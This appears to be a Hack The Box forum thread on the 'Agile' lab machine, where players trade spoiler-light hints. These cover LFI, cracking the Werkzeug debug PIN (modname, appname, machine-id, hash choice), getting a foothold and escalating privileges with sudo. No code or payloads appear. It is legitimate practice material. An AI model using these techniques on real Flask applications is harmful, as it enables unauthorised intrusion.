Official Agile Discussion

Yes I did.
I generated new openvpn file and connected again.(Make sure you are connecting to seasonal) After that I was able to ping the machine

1 Like

Still struggeling with the Pin Exploit. Thought that I got everything right, through the LFI, but all generated Pins won’t work…

and why can’t one use the LFI itself to get a shell? Couldnt locate any log file and proc/self/environ didn’t showed the user agent at all…

No way through LFI to shell?

I suggest you to emulate the same environment you would have on the box, also using the same ‘app.py’. You would find the only piece of information of public bits you are probably missing

Man, i’ve tried emulating this environment in many different ways, still can’t get the correct pin. Even when im using the exact copy of app.py, I double checked all the info there (port, secret_key and etc…) still can’t get it to work, am i missing something? Is there any other files that I should look at?

You can DM me with the code, and I will check what you are missing.

For anyone still stuck on the PIN, there’s a very helpful blog post if one were to google-fu regarding werkzeug pin cracking. The post in question takes into account the multiple possibilities of machine-id, md5 vs sha1, etc… and generates a list of possible PINs. If one were to enumerate the box hard enough to include sufficient permutational parameters, the PIN is crackable.

As one additional hint, the blog post is very new, and my heart goes out to the pour souls who wouldn’t have been able to find this post for about the first week after the machine came out.

3 Likes

Another additional hint for brave one, who want to crack pin.

When you start standalone flask app at you local machine for debug, you’ll have wrong names. Look closer, how app starts. Who start it, and how. Then reproduce this method locally and see how pin changing.

thx
i found the latest blog post about werkzeug pin cracking and finally my script worked
the key is modname and appname. not always flask.app, FLASK

When you reproduce it locally you will notice that it generates two pins. By adding some debugging prints in the code, you will notice that the appname it’s different for the first one… you should try to use this name instead :grinning:

I think i’m in the last stage.

  • I managed to get a foothold
  • i managed to move quite horizontally within the sytem

But i feel like i’m missing something for the root part :sneezing_face:

Debugging connection was closed reason: websocket disconnected :smiling_face_with_tear:

Use sudo -l, when there is something, it is most of the time vulnerable :heart:

idk why but it works now
may need reset

How to set DNS record for su*******.htb? Is there any way to set a record in /etc/hosts that auto-resolves all .htb domains?

Thank you

ya logre terminar la maquina me llevo tiempo pero estaba a la altura

DM me

Hi,
I rooted the box today but I think I didn’t pass one of the steps correctly.
Can I DM someone who has finished the box, to share the steps I made. To see if I benefited from a change made by someone else?
thx

I am trying to generate PIN, to use the console , but the PIN is always incorrect.

Need some help to know exactly which attribute is incorrect while I am generating PIN

Hi,
I managed to gain RCE with a shell as an unprivileged user. However, I’m having trouble finding credentials to connect via SSH as another unprivileged user that I need to escalate my privileges further. I’ve tried various methods, including searching through configuration files, attempting to crack password hashes, and checking for any plaintext passwords, but I haven’t had any luck so far.

I would appreciate it if someone could provide me with some hints without spoiling :wink:
Thanks in advance!